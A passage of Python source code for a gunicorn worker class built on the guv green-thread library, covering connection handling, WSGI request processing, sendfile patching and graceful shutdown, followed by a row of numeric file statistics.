                        self.handle_request(server_name, req, client_sock, addr)
                        gyield()
            except http.errors.NoMoreData as e:
                self.log.debug("Ignored premature client disconnection. %s", e)
            except StopIteration as e:
                self.log.debug("Closing connection. %s", e)
            except ssl.SSLError:
                exc_info = sys.exc_info()
                # pass to next try-except level
                reraise(exc_info[0], exc_info[1], exc_info[2])
            except socket.error:
                exc_info = sys.exc_info()
                # pass to next try-except level
                reraise(exc_info[0], exc_info[1], exc_info[2])
            except Exception as e:
                self.handle_error(req, client_sock, addr, e)
        except ssl.SSLError as e:
            if get_errno(e) == ssl.SSL_ERROR_EOF:
                self.log.debug("ssl connection closed")
                client_sock.close()
            else:
                self.log.debug("Error processing SSL request.")
                self.handle_error(req, client_sock, addr, e)
        except socket.error as e:
            if get_errno(e) not in BROKEN_SOCK:
                self.log.exception("Socket error processing request.")
            else:
                if get_errno(e) == errno.ECONNRESET:
                    self.log.debug("Ignoring connection reset")
                else:
                    self.log.debug("Ignoring EPIPE")
        except Exception as e:
            self.handle_error(req, client_sock, addr, e)
        finally:
            util.close(client_sock)

    def handle_request(self, listener_name, req, sock, addr):
        request_start = datetime.now()
        environ = {}
        resp = None
        try:
            self.cfg.pre_request(self, req)
            resp, environ = wsgi.create(req, sock, addr,
                                        listener_name, self.cfg)
            environ["wsgi.multithread"] = True
            self.nr += 1
            if self.alive and self.nr >= self.max_requests:
                self.log.info("Autorestarting worker after current request.")
                resp.force_close()
                self.alive = False

            if not self.cfg.keepalive:
                resp.force_close()

            respiter = self.wsgi(environ, resp.start_response)
            if respiter == ALREADY_HANDLED:
                return False

            try:
                if isinstance(respiter, environ['wsgi.file_wrapper']):
                    resp.write_file(respiter)
                else:
                    for item in respiter:
                        resp.write(item)
                resp.close()
                request_time = datetime.now() - request_start
                self.log.access(resp, req, environ, request_time)
            except socket.error as e:
                # BROKEN_SOCK not interesting here
                if not get_errno(e) in BROKEN_SOCK:
                    raise
            finally:
                if hasattr(respiter, "close"):
                    respiter.close()

            if resp.should_close():
                raise StopIteration()
        except StopIteration:
            raise
        except Exception:
            if resp and resp.headers_sent:
                # If the requests have already been sent, we should close the
                # connection to indicate the error.
                self.log.exception("Error handling request")
                try:
                    sock.shutdown(socket.SHUT_RDWR)
                    sock.close()
                except socket.error:
                    pass
                raise StopIteration()
            raise
        finally:
            try:
                self.cfg.post_request(self, req, environ, resp)
            except Exception:
                self.log.exception("Exception in post_request hook")

        return True

def _guv_sendfile(fdout, fdin, offset, nbytes):
    while True:
        try:
            return o_sendfile(fdout, fdin, offset, nbytes)
        except OSError as e:
            if get_errno(e) == errno.EAGAIN:
                if not isinstance(fdout, int):
                    fd = fdout.fileno()
                else:
                    fd = fdout
                trampoline(fd, WRITE)
            else:
                raise


def _guv_serve(sock, handle, concurrency):
    pool = greenpool.GreenPool(concurrency)
    server_gt = greenlet.getcurrent()

    while True:
        try:
            conn, addr = sock.accept()
            gt = pool.spawn(handle, conn, addr)
            gt.link(_guv_stop, server_gt, conn)
            conn, addr, gt = None, None, None
        except StopServe:
            pool.waitall()
            return


def _guv_stop(client, server, conn):
    """Stop a greenlet handling a request and close its connection

    This code is lifted from eventlet so as not to depend on undocumented
    functions in the library.
    """
    try:
        try:
            client.wait()
        finally:
            conn.close()
    except greenlet.GreenletExit:
        pass
    except Exception:
        greenthread.kill(server, *sys.exc_info())


def patch_sendfile():
    from gunicorn.http import wsgi

    if o_sendfile is not None:
        setattr(wsgi, "sendfile", _guv_sendfile)

class GuvWorker(AsyncWorker):
    def patch(self):
        guv.monkey_patch(os=False)
        patch_sendfile()

    def init_process(self):
        hubs.use_hub()
        self.patch()
        super().init_process()

    def timeout_ctx(self):
        return guv.Timeout(self.cfg.keepalive or None, False)

    def handle(self, server_sock, client_sock, addr):
        if self.cfg.is_ssl:
            client_sock = guv.wrap_ssl(client_sock, server_side=True, **self.cfg.ssl_options)

        super().handle(server_sock, client_sock, addr)

    def run(self):
        acceptors = []
        for sock in self.sockets:
            gsock = gsocket(sock.FAMILY, socket.SOCK_STREAM, fileno=sock.fileno())
            gsock.setblocking(1)
            hfun = partial(self.handle, gsock)
            acceptor = guv.spawn(_guv_serve, gsock, hfun, self.worker_connections)
            acceptors.append(acceptor)
            guv.gyield()

        try:
            while self.alive:
                self.notify()
                guv.sleep(self.timeout / 2)
        except (KeyboardInterrupt, SystemExit):
            log.debug('KeyboardInterrupt, exiting')

        self.notify()
        try:
            with guv.Timeout(self.cfg.graceful_timeout) as t:
                for a in acceptors:
                    a.kill(guv.StopServe())
                for a in acceptors:
                    a.wait()
        except guv.Timeout as te:
            if te != t:
                raise
            for a in acceptors:
                a.kill()

        log.debug('GuvWorker exited')
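
# Illustrative usage sketch (not part of the original module): running gunicorn with this
# worker class. The worker-class dotted path follows this file's location in the
# repository and the app module name is made up; both are assumptions.
#
#   gunicorn --worker-class guv.support.gunicorn_worker.GuvWorker \
#            --worker-connections 1000 myapp.wsgi:application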
| 32.821053 | 97 | 0.550994 | 1,043 | 9,354 | 4.824545 | 0.255992 | 0.025835 | 0.022258 | 0.016892 | 0.161963 | 0.107512 | 0.091216 | 0.091216 | 0.07651 | 0.050079 | 0 | 0.002529 | 0.365833 | 9,354 | 284 | 98 | 32.93662 | 0.845752 | 0.106051 | 0 | 0.344186 | 0 | 0 | 0.045075 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065116 | false | 0.009302 | 0.093023 | 0.004651 | 0.190698 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |